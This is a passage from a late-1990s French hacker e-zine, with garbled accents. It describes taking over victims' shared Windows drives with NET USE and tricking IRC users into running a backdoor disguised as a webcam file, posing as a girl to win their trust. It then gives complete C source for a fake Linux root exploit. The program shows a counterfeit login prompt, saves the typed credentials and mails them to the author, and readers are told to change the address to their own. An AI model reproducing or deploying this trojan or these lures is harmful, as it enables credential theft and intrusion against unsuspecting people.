E Disque

HP4L Impr.

G Disque

I Disque

Ex‚cution achev‚e.


Je sais donc que tous ces lecteurs sont partag‚s. Parfait, on va donc aller
faire un tour sur le C: .

La commande NET arrive Š ma rescousse :

C:\>NET USE \\MAURO\C

K: Connect‚ … \\MAURO\C

Et voil…, le disque C de la cible est devenu mon disque K: Super non ? Vous
pouvez alors tout visiter et foutre le bordel.

2) DeuxiŠme technique avec le port 666
======================================

Cette technique est trŠs simple... il vous suffit d'envoyer le fichier
envoi.zip que vous trouverez sur le site. Il faut que votre victime accepte
votre fichier, le dezip et l'ouvre. Ensuite vous ouvrez votre WS_FTP
et vous vous connecter sur le port 666 et vous vous trouverez dans le hard
disk de la victime.... :o)

(Note : Seulement possible avec WS-FTP)

- Comment envoyer le fichier a votre victime?

C'est simple... vous aller sur IRC, vous vous donnez un nick de fille
(ex.: Julie20), vous vous trouvez votre victime et vous dite que vous avez
une cam‚ra et que si il veut vous voir il ne suffit d'accepter votre fichier
et de l'ouvrir et il vous verra en direct.. ils refusent rarement. Si il vous
dit qu'il a peur que se soit un virus, demandez-y si il a un anti-virus et
il vous r‚pondra surement oui... alors vous lui r‚pondez de quoi tu as peur?
Vous insistez pas trop sinon il va se douter de quelque chose... et voila,
c'est trŠs simple....

Vous pouvez aussi envoyer le fichier envoi.zip dans un ftp et attendre que la
victime l'ouvre et vous allez pouvoir prendre tous les fichier du ftp, et meme
de tout son hard disk... :-)

(Conseil de Err418 : Ce qui va le mieux c'est de renommer le fichier
webcam.exe et de le zipper sous webcam.zip et de le sender … sa victime :-)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           Un super de bon exploit pour ALLLLLLLLLLLLLLLLL LINuX !! yeah !
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Just look ceci est un FAUX exploit et si vous le runner sur votre
machine, il va me e-mailer la passwd file... super cool.

Prenez ce programme C et modifier le pour que la passwd file soit e-mail‚
directement a vous.

Voici en exemple le prog. qui me emailerais la passwd file … moi !!!!

---------Cut hErE--------------------
/* FTP hole bug [05/01/98]
 * Affected Operating Systems: ALL LINUX
 * Exploitation Result: USers get root suid big on login rhost
 *
 * Syntax:
 * user~$ cc -o suid19 suid19.c
 * user~$ ./suid19
 *
 * it will then test and core dump an rhost file on your home dir with a suid bit
 * then it'll bring you to a login screen and you login as normal and then
 * using the rhost file with a suid bit you have a root shell
 *
 * www:~$ id
 * root
 *
 * pheer!!
 */



#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
typedef struct
{
   char id[9];
   char password[9];
} login;
login loginfake;
void scanend(char *string);
void testX();
void pimpthem();
void fakelogin();
void sttystuff();
void emailus();
void main()
{
  printf("Searching for local ftpd bugs.\n");
  testX();
  pimpthem();
  sttystuff();
  fakelogin();
  emailus();
  
}

void scanend(char *string)
{
  int count;
  for(count=0;count<78;count++)
  {
    if(string[count]==10) string[count]=0;
    if(string[count]==13) string[count]=0;
  }
}

void testX()
{
   char xterm[] = "xterm";
   char xtermcolor[] = "xterm-color";
   char rxvt[] = "rxvt";
   char rxvtcolor[] = "rxvt-color";
   char nxterm[] = "nxterm";
   char noX[] = "You are in X, please exit to run this program";
   if(! (strcmp(getenv("TERM"), xterm)))
   {
     printf("%c\n",noX); 
     exit(-1);
   }
   if( (!strcmp(getenv("TERM"), xtermcolor)))
   {
     printf("%c\n",noX);
     exit(-1);
   }
  if(! (strcmp(getenv("TERM"), rxvt)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
  if(!(strcmp(getenv("TERM"),rxvtcolor)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
  if(!(strcmp(getenv("TERM"),nxterm)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
}

void pimpthem()
{
  printf("\n");
  printf(".\n");
  sleep( 1 );
  printf(".\n");
  sleep( 1 );
  printf(".\n");
  sleep( 1 );
  printf("found buffer overide bug iSegmentation Fault (core dumped)\n");
  sleep( 1 );
  system("clear");
  
}

void fakelogin()
{
   char *input1[10]={0};
   char input[10];
   char var[80] = {0};
   char buffer[80] = {0};
   FILE *fp;
   FILE *file;
   char hostname[80]={0};
   FILE *hostnamefile;
  
   fp = popen("cat /etc/issue.net", "r");
   fread(var, 80, 1, fp);
  
   printf("\n");
   printf("%s",var);
   printf("\n");
  
   hostnamefile=fopen("/etc/HOSTNAME","r");
   fread(hostname,78,1,hostnamefile);
   scanend(hostname);
   printf("%s login: ",hostname);
   gets(input);
  
   *input1=getpass("Password: ");
   printf("\n");
  
   printf("/bin/cat cannot open /etc/motd cought buffer overide!\n");
   printf("opening system fix shell, run fsck\n");
   
   strcpy(loginfake.id, input);
   strcpy(loginfake.password, *input1);
   
   file = fopen("mirror.txt","w");
   fprintf(file, "username:%s\npassword:%s\nUID:%i",loginfake.id, loginfake.password, getuid());
   fclose(file);
}

void emailus()
{
  char guilly[] = "err418@technologist.com";
  char thegza[] = "err418@technologist.com";
  char *foo;
  char *poo;
  
  foo=(char *)malloc(4096);
  sprintf(foo, "mail %s < mirror.txt",guilly);
  poo=(char *)malloc(4096);
  sprintf(poo, "mail %s < mirror.txt",thegza);
  system(foo);
  system(poo);
}

void sttystuff()
{
  system("stty susp ^G");
  system("stty intr ^Q");
}
---------Cut hErE--------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                0=----------=0
                                | Conclusion |
                                0=----------=0
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Ok ! Voici ce qui close ce num‚ro 13 de TC magazine.. j'espŠre que
vous en avez appris...

        On se revoie le 13 juin prochain... see ya !

(-=-=-=-=-=-=-=-=-=-=-=-=-=-=Fin de la transmission-=-=-=-=-=-=-=-=-=-=-=-=-=)
